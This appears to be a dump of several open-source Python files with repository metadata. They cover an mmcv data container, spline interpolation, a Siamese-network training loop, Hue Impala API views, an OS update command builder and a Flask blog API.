2018-10-12T08:39:46.000Z
|
2022-03-31T17:22:55.000Z
|
mmcv/parallel/data_container.py
|
BIGWangYuDong/mmcv
|
c46deb0576edaff5cd5a7d384c617478c7a73a70
|
[
"Apache-2.0"
] | 1,637
|
2018-10-12T06:06:18.000Z
|
2022-03-31T02:20:53.000Z
|
mmcv/parallel/data_container.py
|
BIGWangYuDong/mmcv
|
c46deb0576edaff5cd5a7d384c617478c7a73a70
|
[
"Apache-2.0"
] | 1,234
|
2018-10-12T09:28:20.000Z
|
2022-03-31T15:56:24.000Z
|
# Copyright (c) OpenMMLab. All rights reserved.
import functools
import torch
def assert_tensor_type(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
if not isinstance(args[0].data, torch.Tensor):
raise AttributeError(
f'{args[0].__class__.__name__} has no attribute '
f'{func.__name__} for type {args[0].datatype}')
return func(*args, **kwargs)
return wrapper
class DataContainer:
"""A container for any type of objects.
Typically tensors will be stacked in the collate function and sliced along
some dimension in the scatter function. This behavior has some limitations.
1. All tensors have to be the same size.
2. Types are limited (numpy array or Tensor).
We design `DataContainer` and `MMDataParallel` to overcome these
limitations. The behavior can be either of the following.
- copy to GPU, pad all tensors to the same size and stack them
- copy to GPU without stacking
    - leave the objects as-is and pass them to the model
- pad_dims specifies the number of last few dimensions to do padding
"""
def __init__(self,
data,
stack=False,
padding_value=0,
cpu_only=False,
pad_dims=2):
self._data = data
self._cpu_only = cpu_only
self._stack = stack
self._padding_value = padding_value
assert pad_dims in [None, 1, 2, 3]
self._pad_dims = pad_dims
def __repr__(self):
return f'{self.__class__.__name__}({repr(self.data)})'
def __len__(self):
return len(self._data)
@property
def data(self):
return self._data
@property
def datatype(self):
if isinstance(self.data, torch.Tensor):
return self.data.type()
else:
return type(self.data)
@property
def cpu_only(self):
return self._cpu_only
@property
def stack(self):
return self._stack
@property
def padding_value(self):
return self._padding_value
@property
def pad_dims(self):
return self._pad_dims
@assert_tensor_type
def size(self, *args, **kwargs):
return self.data.size(*args, **kwargs)
@assert_tensor_type
def dim(self):
return self.data.dim()
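# --- Hedged usage sketch (editor's addition, not part of the original file). ---
# A minimal illustration of the behaviour documented above: tensor payloads expose the
# tensor-only helpers such as .size(), while non-tensor payloads still work for
# .data / .datatype but raise AttributeError on the tensor-only accessors.
def _example_data_container():  # pragma: no cover
    tensor_dc = DataContainer(torch.ones(3, 4), stack=True, pad_dims=2)
    assert tensor_dc.stack and tensor_dc.pad_dims == 2
    assert tensor_dc.size() == torch.Size([3, 4])     # allowed: payload is a tensor

    meta_dc = DataContainer({'filename': 'img.png'}, cpu_only=True)
    assert meta_dc.datatype is dict                   # non-tensor payloads report their type
    try:
        meta_dc.size()                                # tensor-only accessor
    except AttributeError:
        pass                                          # raised by @assert_tensor_type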
| 26.277778
| 79
| 0.62241
|
6433ca0e0c1c0316452cceedb5f77df0e71c419c
| 3,108
|
py
|
Python
|
rsbook_code/planning/paths.py
|
patricknaughton01/RoboticSystemsBook
|
0fc67cbccee0832b5f9b00d848c55697fa69bedf
|
[
"Apache-2.0"
] | 116
|
2018-08-27T15:32:59.000Z
|
2022-02-28T10:41:37.000Z
|
rsbook_code/planning/paths.py
|
patricknaughton01/RoboticSystemsBook
|
0fc67cbccee0832b5f9b00d848c55697fa69bedf
|
[
"Apache-2.0"
] | 2
|
2021-05-04T12:56:40.000Z
|
2022-02-18T23:13:33.000Z
|
rsbook_code/planning/paths.py
|
patricknaughton01/RoboticSystemsBook
|
0fc67cbccee0832b5f9b00d848c55697fa69bedf
|
[
"Apache-2.0"
] | 29
|
2019-06-20T20:13:36.000Z
|
2022-02-20T14:01:34.000Z
|
import numpy as np
import math
def linear(m0,m1,u,domain=None):
"""For completeness: linear interpolation between m0 and m1 at parameter u in [0,1].
    Alternatively, if `domain` != None, then this will use domain=(a,b)
    as the interpolation domain.
"""
if domain is not None:
return linear(m0,m1,(u-domain[0])/(domain[1]-domain[0]))
return (1.0-u)*m0 + u*m1
def piecewise_linear(ms,u,times=None):
"""Evaluate a piecewise linear spline at interpolation parameter u in [0,1]
Milestones are given by the array `ms`. `ms` is assumed to be a list of
n Numpy arrays, or an n x d Numpy array.
If `times` != None, this will be a list of n non-decreasing time indices.
"""
if times is not None:
raise NotImplementedError("Not done with timed paths")
n = len(ms)
s = u*n
i = int(math.floor(s))
u = s - i
if i < 0: return ms[0]
elif i+1 >= n: return ms[-1]
return linear(ms[i],ms[i+1],u)
def hermite(m0,m1,t0,t1,u,domain=None):
"""Evaluate a cubic hermite curve at interpolation parameter u in [0,1].
Endpoints are m0 and m1, with derivatives t0 and t1. These are assumed to be Numpy arrays.
Alternatively, if `domain` != None, then this will use domain=(a,b)
as the interpolation domain
"""
if domain is not None:
assert isinstance(domain,(list,tuple)) and len(domain) == 2,"Need to provide a pair as a domain"
scale = (domain[1]-domain[0])
t = (u - domain[0])/scale
return hermite(m0,m1,t0*scale,t1*scale,t)
u2 = u**2
u3 = u**3
cm0 = 2*u3 - 3*u2 + 1
cm1 = -2*u3 + 3*u2
ct0 = u3 - 2*u2 + u
ct1 = u3 - u2
return cm0*m0 + cm1*m1 + ct0*t0 + ct1*t1
def hermite_deriv(m0,m1,t0,t1,u,domain=None):
"""Evaluate the derivative of a cubic hermite curve at interpolation parameter u in [0,1].
Endpoints are m0 and m1, with derivatives t0 and t1. These are assumed to be numpy arrays.
Alternatively, if `domain` != None, then this will use domain=(a,b)
as the interpolation domain
"""
if domain is not None:
assert isinstance(domain,(list,tuple)) and len(domain) == 2,"Need to provide a pair as a domain"
scale = (domain[1]-domain[0])
t = (u - domain[0])/scale
return hermite_deriv(m0,m1,t0*scale,t1*scale,t)
u2 = u**2
cm0 = 6*u2 - 6*u
cm1 = -6*u2 + 6*u
ct0 = 3*u2 - 4*u + 1
ct1 = 3*u2 - 2*u
return cm0*m0 + cm1*m1 + ct0*t0 + ct1*t1
def hermite_spline(ms,ts,u,times=None):
"""Evaluate a cubic hermite spline at interpolation parameter u in [0,1].
Milestones are given in `ms`, with derivatives in `ts`. These are assumed to be
lists of n Numpy arrays, or n x d Numpy arrays.
If `times` != None, this will be a list of n non-decreasing time indices.
"""
if times is not None:
raise NotImplementedError("Not done with timed paths")
n = len(ms)
s = u*n
i = int(math.floor(s))
u = s - i
if i < 0: return ms[0]
elif i+1 >= n: return ms[-1]
return hermite(ms[i],ms[i+1],ts[i],ts[i+1],u)
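# --- Worked example (editor's addition, not part of the original module). ---
# A quick numerical sanity check of the interpolants above: a cubic Hermite curve passes
# through its endpoints with the prescribed derivatives, and piecewise_linear returns the
# first/last milestone at u=0 and u=1.
def _example_interpolation():  # pragma: no cover
    m0, m1 = np.array([0.0, 0.0]), np.array([1.0, 2.0])
    t0, t1 = np.array([1.0, 0.0]), np.array([0.0, 1.0])
    assert np.allclose(hermite(m0, m1, t0, t1, 0.0), m0)         # u=0 -> start point
    assert np.allclose(hermite(m0, m1, t0, t1, 1.0), m1)         # u=1 -> end point
    assert np.allclose(hermite_deriv(m0, m1, t0, t1, 0.0), t0)   # start derivative

    ms = [np.array([0.0]), np.array([1.0]), np.array([4.0])]
    assert np.allclose(piecewise_linear(ms, 0.0), ms[0])         # u=0 -> first milestone
    assert np.allclose(piecewise_linear(ms, 1.0), ms[-1])        # u=1 -> last milestone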
| 32.715789
| 104
| 0.607465
|
d2be0693ac3b63c0e837b131c3715a876de2a61b
| 3,325
|
py
|
Python
|
train.py
|
jalywang123/facial-reidentification
|
7bf9293eb50b6081e598aeff1516523057bbe002
|
[
"MIT"
] | null | null | null |
train.py
|
jalywang123/facial-reidentification
|
7bf9293eb50b6081e598aeff1516523057bbe002
|
[
"MIT"
] | null | null | null |
train.py
|
jalywang123/facial-reidentification
|
7bf9293eb50b6081e598aeff1516523057bbe002
|
[
"MIT"
] | 1
|
2021-01-06T00:02:26.000Z
|
2021-01-06T00:02:26.000Z
|
import sys
import argparse
import time
import torch
import PIL.ImageOps
from tqdm import tqdm
import torch.nn as nn
from torch import optim
import torchvision.utils
from helpers import show_plot
from datetime import datetime
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset
import torchvision.datasets as dset
import torchvision.datasets.fakedata
import torchvision.transforms as transforms
from loss import ContrastiveLoss
from siamesenetwork import SiameseNetwork
from siamesenetwork import SiameseNetwork_V2
from siamesenetwork import SiameseNetworkDataset
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print(f"training device: {device}")
args = argparse.ArgumentParser()
args.add_argument("--epoch")
args.add_argument("--lr")
res = args.parse_args()
class Config:
training_dir = "./lfw_funneled"
train_batch_size = 64
    train_number_epochs = int(res.epoch) if res.epoch else 500  # fall back to 500 when --epoch is absent
folder_dataset = dset.ImageFolder(root=Config.training_dir)
siamese_dataset = SiameseNetworkDataset(
imageFolderDataset=folder_dataset,
transform=transforms.Compose(
[
transforms.Resize((100, 100)),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
]
),
should_invert=False,
)
train_dataloader = DataLoader(
siamese_dataset,
shuffle=True,
# num_workers=8,
batch_size=Config.train_batch_size,
)
net = SiameseNetwork().to(device)
criterion = ContrastiveLoss().to(device)
optimizer = optim.Adam(net.parameters(), lr=float(res.lr) if res.lr else 0.0003)  # default lr when --lr is absent
counter = []
loss_history = []
iteration_number = 0
try:
import slack_callback
except Exception as e:
pass
for epoch in range(1, Config.train_number_epochs + 1):
start = time.time()
for i, data in enumerate(train_dataloader, 0):
img0, img1, label = data
img0, img1, label = img0.to(device), img1.to(device), label.to(device)
optimizer.zero_grad()
output1, output2 = net(img0, img1)
loss_contrastive = criterion(output1, output2, label)
loss_contrastive.backward()
optimizer.step()
# if i % 10 == 0:
# print(
# "epoch: {} current loss: {} time taken: {}s".format(
# epoch, loss_contrastive.item(), str(time.time() - start)[:5]
# )
# )
message = "epoch: {} current loss: {:.4f} time taken: {}s".format(
epoch, loss_contrastive.item(), str(time.time() - start)[:5]
)
try:
slack_callback.write(message)
except Exception as e:
pass
print(
"epoch: {} current loss: {:.4f} time taken: {}s".format(
epoch, loss_contrastive.item(), str(time.time() - start)[:5]
)
)
# iteration_number += 10
counter.append(epoch)
loss_history.append(loss_contrastive.item())
if epoch % 50 == 0 and epoch > 0:
state_dict = {
"epoch": epoch + 1,
"state_dict": net.state_dict(),
"optim_dict": optimizer.state_dict(),
"loss_history": loss_history,
"counter": counter,
}
torch.save(state_dict, f"models/model_state_dict_{epoch}.pt")
print()
print(f"model checkpoint saved to models/model_state_dict_{epoch}")
show_plot(counter, loss_history, save=True)
| 28.418803
| 78
| 0.664662
|
e515a3360cfdc2a55c57866968737de94ac33caa
| 631
|
py
|
Python
|
main_gen.py
|
rongcloud/rongcloud-message-generator
|
3ac5cfca0488e17ba1d3eaf1b547b248cfc296c9
|
[
"MIT"
] | null | null | null |
main_gen.py
|
rongcloud/rongcloud-message-generator
|
3ac5cfca0488e17ba1d3eaf1b547b248cfc296c9
|
[
"MIT"
] | null | null | null |
main_gen.py
|
rongcloud/rongcloud-message-generator
|
3ac5cfca0488e17ba1d3eaf1b547b248cfc296c9
|
[
"MIT"
] | null | null | null |
#coding=utf-8
from MsgObj import MsgObj;
import Util
def main():
    # 1. Construct the MsgObj object
obj = MsgObj("CustomMessage","app:cusMsg")
    # 2. Set the message persistence flag
obj.setPersistentFlag(Util.Persistent.IsCounted)
    # 3. Set the package name that contains the message (Android only)
obj.setPackage("cn.rongcloud.im.im.message")
    # 4. Set the parameter list
obj.addParamBool("isVip")
obj.addParamString("name")
obj.addParamString("uid")
obj.addParamInt("age")
obj.addParamDouble("price")
obj.addParamMap("dataMap")
obj.addParamList("dataList")
    # 5. Print the message content
obj.showDetail()
    # 6. Generate the message
obj.genMsg()
pass
if __name__ == '__main__':
main()
| 19.71875
| 52
| 0.638669
|
38776d6d686bf44e8f4753f15c9dcfc3599d9d85
| 10,399
|
py
|
Python
|
inbm/dispatcher-agent/dispatcher/sota/os_updater.py
|
ahameedx/intel-inb-manageability
|
aca445fa4cef0b608e6e88e74476547e10c06073
|
[
"Apache-2.0"
] | null | null | null |
inbm/dispatcher-agent/dispatcher/sota/os_updater.py
|
ahameedx/intel-inb-manageability
|
aca445fa4cef0b608e6e88e74476547e10c06073
|
[
"Apache-2.0"
] | null | null | null |
inbm/dispatcher-agent/dispatcher/sota/os_updater.py
|
ahameedx/intel-inb-manageability
|
aca445fa4cef0b608e6e88e74476547e10c06073
|
[
"Apache-2.0"
] | null | null | null |
"""
SOTA updates factory class. Used to trigger
package installation, updates, security updates etc
Copyright (C) 2017-2022 Intel Corporation
SPDX-License-Identifier: Apache-2.0
"""
import logging
import re
import os
from pathlib import Path
from typing import List, Optional
from abc import ABC, abstractmethod
from inbm_common_lib.utility import CanonicalUri
from inbm_common_lib.shell_runner import PseudoShellRunner
from inbm_lib.constants import DOCKER_CHROOT_PREFIX, CHROOT_PREFIX
from .command_list import CommandList
from .constants import MENDER_ARTIFACT_INSTALL_COMMAND
from .constants import MENDER_UPDATE_SCRIPT_EHL
from .constants import MENDER_COMMAND
from .constants import MENDER_MINIMIZE_LOGS_ARGUMENT
from .constants import MENDER_INSTALL_ARGUMENT
from .converter import size_to_bytes
from .sota_error import SotaError
from ..common import uri_utilities
from ..packagemanager import irepo
logger = logging.getLogger(__name__)
class OsUpdater(ABC):
"""Abstract class for handling OS update related tasks for the system."""
def __init__(self) -> None:
self.cmd_list: List = []
@abstractmethod
def update_remote_source(self, uri: Optional[CanonicalUri], repo: irepo.IRepo) -> List[str]:
"""Abstract class method to create command list to update from a remote source.
@param uri: Original download URI, if given in manifest.
@param repo: Directory on disk where update has been downloaded, if given in manifest.
@return: Command list to execute to perform update.
"""
pass
@abstractmethod
def update_local_source(self, file_path: str) -> List[str]:
"""Abstract class method to create command list to update from a local source.
@param file_path: path to local file
@return: Command list to execute to perform update.
"""
pass
@staticmethod
def get_estimated_size() -> int:
"""Gets the size of the update
        @return: 0 if disk space will be freed; otherwise the size consumed, in bytes
"""
pass
@staticmethod
def _create_local_mender_cmd(file_path: str) -> List[str]:
commands = [" " + MENDER_COMMAND + " " + MENDER_INSTALL_ARGUMENT + " " +
file_path + " " + MENDER_MINIMIZE_LOGS_ARGUMENT]
return CommandList(commands).cmd_list
class DebianBasedUpdater(OsUpdater):
"""DebianBasedUpdater class, child of OsUpdater"""
def __init__(self) -> None:
super().__init__()
def update_remote_source(self, uri: Optional[CanonicalUri], repo: irepo.IRepo) -> List[str]:
"""Concrete class method to create command list to update from a remote source for Debian OS.
@param uri: Original download URI, if given in manifest.
@param repo: Directory on disk where update has been downloaded, if given in manifest.
@return: Command list to execute to perform update.
"""
logger.debug("")
os.environ["DEBIAN_FRONTEND"] = "noninteractive"
is_docker_app = os.environ.get("container", False)
if is_docker_app:
logger.debug("APP ENV : {}".format(is_docker_app))
# get all packages ready for install (requires network and does
# not require host PID/DOCKER_CHROOT_PREFIX), then run the install locally
# (does not require network but does require host PID/DOCKER_CHROOT_PREFIX)
cmds = [CHROOT_PREFIX + "/usr/bin/apt-get update", # needs network
CHROOT_PREFIX + "/usr/bin/dpkg-query -f '${binary:Package}\\n' -W",
CHROOT_PREFIX + "/usr/bin/apt-get -yq --download-only upgrade", # needs network
DOCKER_CHROOT_PREFIX + "/usr/bin/apt-get -yq upgrade"] # local
else:
cmds = ["apt-get update",
"dpkg-query -f '${binary:Package}\\n' -W", "apt-get -yq upgrade"]
return CommandList(cmds).cmd_list
def update_local_source(self, file_path: str) -> List[str]:
"""Concrete class method to create command list to update from a local source for Debian OS.
@param file_path: path to local file
@return: Command list to execute to perform update.
"""
logger.error('Local install of Debian packages is not supported.')
return CommandList([]).cmd_list
@staticmethod
def get_estimated_size() -> int:
"""Gets the size of the update
        @return: 0 if disk space will be freed; otherwise the size consumed, in bytes
"""
logger.debug("")
is_docker_app = os.environ.get("container", False)
cmd = "/usr/bin/apt-get -u upgrade --assume-no"
if is_docker_app:
logger.debug("APP ENV : {}".format(is_docker_app))
(upgrade, _, _) = PseudoShellRunner.run(DOCKER_CHROOT_PREFIX + cmd)
else:
(upgrade, _, _) = PseudoShellRunner.run(cmd)
return DebianBasedUpdater._get_estimated_size_from_apt_get_upgrade(upgrade)
@staticmethod
def _get_estimated_size_from_apt_get_upgrade(upgrade_output: str) -> int:
logger.debug("")
output = "\n".join([k for k in upgrade_output.splitlines() if 'After this operation' in k])
update_regex = re.search(r"(\d+(,\d+)*(\.\d+)?.(kB|B|mB|gB)).*(freed|used)", output)
try:
if update_regex is None:
return 0
size_string = update_regex.group(1)
freed_or_used = update_regex.group(5)
update_size = size_to_bytes(size_string.replace(',', ''))
if freed_or_used == "used":
return update_size
else:
logger.info('Update will free some size on disk')
return 0
except AttributeError: # TODO(gblewis1): return/process an error--size could be > than 0
logger.info('Update size could not be extracted!')
return 0
class YoctoX86_64Updater(OsUpdater):
"""YoctoX86_64Updater class, child of OsUpdater"""
def __init__(self) -> None:
super().__init__()
def update_remote_source(self, uri: Optional[CanonicalUri], repo: irepo.IRepo) -> List[str]:
"""Concrete class method to create command list to update from a remote source for Yocto X86 OS.
@param uri: Original download URI, if given in manifest.
@param repo: Directory on disk where update has been downloaded, if given in manifest.
@return: Command list to execute to perform update.
"""
if uri is None:
raise SotaError("missing URI.")
filename = uri_utilities.uri_to_filename(uri.value)
commands = [" " + MENDER_COMMAND + " " + MENDER_INSTALL_ARGUMENT + " " +
str(Path(repo.get_repo_path()) / filename) + " "
+ MENDER_MINIMIZE_LOGS_ARGUMENT]
# Only some Yocto systems need to run an additional command after running mender.
if Path(str(MENDER_UPDATE_SCRIPT_EHL)).is_file():
commands.append(MENDER_ARTIFACT_INSTALL_COMMAND)
return CommandList(commands).cmd_list
def update_local_source(self, file_path: str) -> List[str]:
"""Concrete class method to create command list to update from a local source for Yocto X86 OS.
@param file_path: path to local file
@return: Command list to execute to perform update.
"""
return super()._create_local_mender_cmd(file_path)
@staticmethod
def get_estimated_size() -> int:
"""Gets the size of the update
        @return: 0 if disk space will be freed; otherwise the size consumed, in bytes
"""
return 0
class YoctoARMUpdater(OsUpdater):
"""YoctoARMUpdater class, child of OsUpdater"""
def __init__(self) -> None:
super().__init__()
def update_remote_source(self, uri: Optional[CanonicalUri], repo: irepo.IRepo) -> List[str]:
"""Concrete class method to create command list to update from a remote source for Yocto ARM OS.
@param uri: Original download URI, if given in manifest.
@param repo: Directory on disk where update has been downloaded, if given in manifest.
@return: Command list to execute to perform update.
"""
if uri is None:
raise SotaError("missing URI.")
try:
filename = uri.value[uri.value.rfind("/") + 1:]
except IndexError:
raise SotaError('URI ' + str(uri) + ' is improperly formatted')
commands = [" " + MENDER_COMMAND + " " + MENDER_INSTALL_ARGUMENT + " " +
str(Path(repo.get_repo_path()) / filename) + " "
+ MENDER_MINIMIZE_LOGS_ARGUMENT]
return CommandList(commands).cmd_list
def update_local_source(self, file_path: str) -> List[str]:
"""Concrete class method to create command list to update from a remote source for Yocto ARM OS.
@param file_path: path to local file
@return: Command list to execute to perform update.
"""
return super()._create_local_mender_cmd(file_path)
@staticmethod
def get_estimated_size() -> int:
"""Gets the size of the update
        @return: 0 if disk space will be freed; otherwise the size consumed, in bytes
"""
return 0
class WindowsUpdater(OsUpdater):
"""WindowsUpdater class, child of OsUpdater"""
def __init__(self) -> None:
super().__init__()
def update_remote_source(self, uri: Optional[CanonicalUri], repo: irepo.IRepo) -> List[str]:
"""Concrete class method to create command list to update from a remote source for Windows OS.
@param uri: Original download URI, if given in manifest.
@param repo: Directory on disk where update has been downloaded, if given in manifest.
@return: Command list to execute to perform update.
"""
pass
def update_local_source(self, file_path: str) -> List[str]:
"""Concrete class method to create command list to update from a remote source for Windows OS.
@param file_path: path to local file
@return: Command list to execute to perform update.
"""
pass
@staticmethod
def get_estimated_size() -> int:
"""Gets the size of the update. Stub.
        @return: 0 if disk space will be freed; otherwise the size consumed, in bytes
"""
return 0
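# --- Hedged illustration (editor's addition, not part of the original module). ---
# It shows the kind of `apt-get upgrade --assume-no` output that
# DebianBasedUpdater._get_estimated_size_from_apt_get_upgrade() parses. The sample text
# is illustrative, and the exact byte count depends on size_to_bytes() from .converter,
# which is not shown here.
def _example_apt_size_parsing():  # pragma: no cover
    sample_output = (
        "The following packages will be upgraded:\n"
        "  libexample1 libexample-data\n"
        "After this operation, 4,227 kB of additional disk space will be used.\n"
    )
    consumed = DebianBasedUpdater._get_estimated_size_from_apt_get_upgrade(sample_output)
    assert consumed > 0  # "used" reports consumed bytes; a "freed" line would yield 0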
| 39.093985
| 104
| 0.650159
|
949efeb188218c5ae4eed5fe198adfcc18bb4606
| 3,045
|
py
|
Python
|
pyser/api/blog.py
|
pyserorg/backend
|
af6be4db7ed7961e80337c95de1e7cd8a06b778a
|
[
"BSD-2-Clause"
] | 1
|
2019-05-06T20:54:06.000Z
|
2019-05-06T20:54:06.000Z
|
pyser/api/blog.py
|
mekanix/pyser-backend
|
af6be4db7ed7961e80337c95de1e7cd8a06b778a
|
[
"BSD-2-Clause"
] | null | null | null |
pyser/api/blog.py
|
mekanix/pyser-backend
|
af6be4db7ed7961e80337c95de1e7cd8a06b778a
|
[
"BSD-2-Clause"
] | 2
|
2018-12-01T20:35:54.000Z
|
2018-12-26T18:13:18.000Z
|
from datetime import datetime
from freenit.api.methodviews import MethodView
from freenit.schemas.paging import PageInSchema, paginate
from flask_jwt_extended import get_jwt_identity, jwt_optional, jwt_required
from flask_smorest import Blueprint, abort
from freenit.models.sql.user import User
from ..models.blog import Blog
from ..schemas.blog import BlogPageOutSchema, BlogSchema
blueprint = Blueprint('blogs', 'blogs')
@blueprint.route('', endpoint='list')
class BlogListAPI(MethodView):
@jwt_optional
@blueprint.arguments(PageInSchema(), location='headers')
@blueprint.response(BlogPageOutSchema)
def get(self, pagination):
"""List blog posts"""
user_id = get_jwt_identity()
if user_id is None:
query = Blog.select().where(Blog.published)
else:
query = Blog.select()
return paginate(query, pagination)
@jwt_required
@blueprint.arguments(BlogSchema)
@blueprint.response(BlogSchema)
def post(self, args):
"""Create blog post"""
blog = Blog(**args)
blog.date = datetime.utcnow()
user_id = get_jwt_identity()
try:
user = User.get(id=user_id)
except User.DoesNotExist:
abort(404, message='User not found')
try:
Blog.find(
blog.date.year,
blog.date.month,
blog.date.day,
blog.slug,
)
abort(409, message='Post with the same title already exists')
except Blog.DoesNotExist:
blog.author = user
blog.save()
return blog
@blueprint.route('/<year>/<month>/<day>/<slug>', endpoint='detail')
class BlogAPI(MethodView):
@blueprint.response(BlogSchema)
def get(self, year, month, day, slug):
"""Get blog post details"""
try:
blog = Blog.find(year, month, day, slug)
except Blog.DoesNotExist:
abort(404, message='No such blog')
except ValueError:
abort(409, message='Multiple blogs found')
return blog
@jwt_required
@blueprint.arguments(BlogSchema(partial=True))
@blueprint.response(BlogSchema)
def patch(self, args, year, month, day, slug):
"""Edit blog post details"""
try:
blog = Blog.find(year, month, day, slug)
except Blog.DoesNotExist:
abort(404, message='No such blog')
except ValueError:
abort(409, message='Multiple blogs found')
for field in args:
setattr(blog, field, args[field])
blog.save()
return blog
@jwt_required
@blueprint.response(BlogSchema)
def delete(self, year, month, day, slug):
"""Delete blog post"""
try:
blog = Blog.find(year, month, day, slug)
except Blog.DoesNotExist:
abort(404, message='No such blog')
except ValueError:
abort(409, message='Multiple blogs found')
blog.delete_instance()
return blog
| 31.71875
| 75
| 0.610181
|
4dfc1d00f19201b3dd2153e2c67227e45094a49c
| 6,989
|
py
|
Python
|
apps/impala/src/impala/api.py
|
FrommyMind/hue
|
60a2df13da71bed656adbf61269ab841e2370ed4
|
[
"Apache-2.0"
] | 2
|
2020-02-02T15:22:13.000Z
|
2020-07-29T15:25:44.000Z
|
apps/impala/src/impala/api.py
|
FrommyMind/hue
|
60a2df13da71bed656adbf61269ab841e2370ed4
|
[
"Apache-2.0"
] | 7
|
2019-11-28T21:48:38.000Z
|
2020-08-02T18:06:40.000Z
|
apps/impala/src/impala/api.py
|
FrommyMind/hue
|
60a2df13da71bed656adbf61269ab841e2370ed4
|
[
"Apache-2.0"
] | 6
|
2020-05-29T21:46:30.000Z
|
2020-12-15T20:32:19.000Z
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
## Main views are inherited from Beeswax.
import base64
import logging
import json
import struct
from django.utils.translation import ugettext as _
from django.views.decorators.http import require_POST
from beeswax.api import error_handler
from beeswax.models import Session
from beeswax.server import dbms as beeswax_dbms
from beeswax.views import authorized_get_query_history
from desktop.lib.django_util import JsonResponse
from desktop.lib.thrift_util import unpack_guid
from desktop.models import Document2
from jobbrowser.apis.query_api import _get_api
from impala import dbms
from impala.server import get_api as get_impalad_api, _get_impala_server_url
from libanalyze import analyze as analyzer, rules
from notebook.models import make_notebook
LOG = logging.getLogger(__name__)
ANALYZER = rules.TopDownAnalysis() # We need to parse some files so save as global
@require_POST
@error_handler
def invalidate(request):
cluster = json.loads(request.POST.get('cluster', '{}'))
database = request.POST.get('database', None)
table = request.POST.get('table', None)
flush_all = request.POST.get('flush_all', 'false').lower() == 'true'
query_server = dbms.get_query_server_config(connector=None) # TODO: connector support
db = beeswax_dbms.get(request.user, query_server=query_server)
response = {'status': 0, 'message': ''}
db.invalidate(database=database, table=table, flush_all=flush_all)
response['message'] = _('Successfully invalidated metadata')
return JsonResponse(response)
@require_POST
@error_handler
def refresh_table(request, database, table):
query_server = dbms.get_query_server_config()
db = beeswax_dbms.get(request.user, query_server=query_server)
response = {'status': 0, 'message': ''}
db.refresh_table(database, table)
response['message'] = _('Successfully refreshed metadata for `%s`.`%s`') % (database, table)
return JsonResponse(response)
@require_POST
@error_handler
def get_exec_summary(request, query_history_id):
query_server = dbms.get_query_server_config()
db = beeswax_dbms.get(request.user, query_server=query_server)
response = {'status': -1}
query_history = authorized_get_query_history(request, query_history_id, must_exist=True)
if query_history is None:
response['message'] = _('get_exec_summary requires a valid query_history_id')
else:
session = Session.objects.get_session(request.user, query_server['server_name'])
operation_handle = query_history.get_handle().get_rpc_handle()
session_handle = session.get_handle()
summary = db.get_exec_summary(operation_handle, session_handle)
response['status'] = 0
response['summary'] = summary
return JsonResponse(response)
@require_POST
@error_handler
def get_runtime_profile(request, query_history_id):
query_server = dbms.get_query_server_config()
db = beeswax_dbms.get(request.user, query_server=query_server)
response = {'status': -1}
query_history = authorized_get_query_history(request, query_history_id, must_exist=True)
if query_history is None:
response['message'] = _('get_runtime_profile requires a valid query_history_id')
else:
session = Session.objects.get_session(request.user, query_server['server_name'])
operation_handle = query_history.get_handle().get_rpc_handle()
session_handle = session.get_handle()
profile = db.get_runtime_profile(operation_handle, session_handle)
response['status'] = 0
response['profile'] = profile
return JsonResponse(response)
@require_POST
@error_handler
def alanize(request):
response = {'status': -1}
cluster = json.loads(request.POST.get('cluster', '{}'))
query_id = json.loads(request.POST.get('query_id'))
api = _get_api(request.user, cluster=cluster)
if query_id:
LOG.debug("Attempting to get Impala query profile for query ID: %s" % (query_id))
doc = Document2.objects.get(id=query_id)
snippets = doc.data_dict.get('snippets', [])
secret = snippets[0]['result']['handle']['secret']
impala_query_id = unpack_guid(base64.decodestring(secret))
query_profile = api.get_query_profile_encoded(impala_query_id)
profile = analyzer.analyze(analyzer.parse_data(query_profile))
ANALYZER.pre_process(profile)
result = ANALYZER.run(profile)
heatmap = {}
summary = analyzer.summary(profile)
heatmapMetrics = ['AverageThreadTokens', 'BloomFilterBytes', 'PeakMemoryUsage', 'PerHostPeakMemUsage', 'PrepareTime', 'RowsProduced', 'TotalCpuTime', 'TotalNetworkReceiveTime', 'TotalNetworkSendTime', 'TotalStorageWaitTime', 'TotalTime']
for key in heatmapMetrics:
metrics = analyzer.heatmap_by_host(profile, key)
if metrics['data']:
heatmap[key] = metrics
response['data'] = { 'query': { 'healthChecks' : result[0]['result'], 'summary': summary, 'heatmap': heatmap, 'heatmapMetrics': sorted(list(heatmap.keys())) } }
response['status'] = 0
return JsonResponse(response)
def alanize_metrics(request):
response = {'status': -1}
cluster = json.loads(request.POST.get('cluster', '{}'))
query_id = json.loads(request.POST.get('query_id'))
api = _get_api(request.user, cluster=cluster)
if query_id:
LOG.debug("Attempting to get Impala query profile for query ID: %s" % (query_id))
query_profile = api.get_query_profile_encoded(query_id)
profile = analyzer.analyze(analyzer.parse_data(query_profile))
ANALYZER.pre_process(profile)
metrics = analyzer.metrics(profile)
response['data'] = metrics
response['status'] = 0
return JsonResponse(response)
@require_POST
@error_handler
def alanize_fix(request):
response = {'status': -1}
cluster = json.loads(request.POST.get('cluster', '{}'))
fix = json.loads(request.POST.get('fix'))
  start_time = json.loads(request.POST.get('start_time', '-1'))  # default of -1 when start_time is absent
if fix['id'] == 0:
notebook = make_notebook(
name=_('compute stats %(data)s') % fix,
editor_type='impala',
statement='compute stats %(data)s' % fix,
status='ready',
last_executed=start_time,
is_task=True,
compute=cluster
)
response['details'] = { 'task': notebook.execute(request, batch=True) }
response['status'] = 0
return JsonResponse(response)
| 35.841026
| 241
| 0.742882
|
b1164bfa00c99fd7f2e852504c7c43d111bd6d12
| 307
|
py
|
Python
|
orcinus/workspace/__init__.py
|
orcinus-lang/orcinus-bootstrap
|
3a4766f05a21ca5d4cd6384d1857ec1ffaa09518
|
[
"MIT"
] | null | null | null |
orcinus/workspace/__init__.py
|
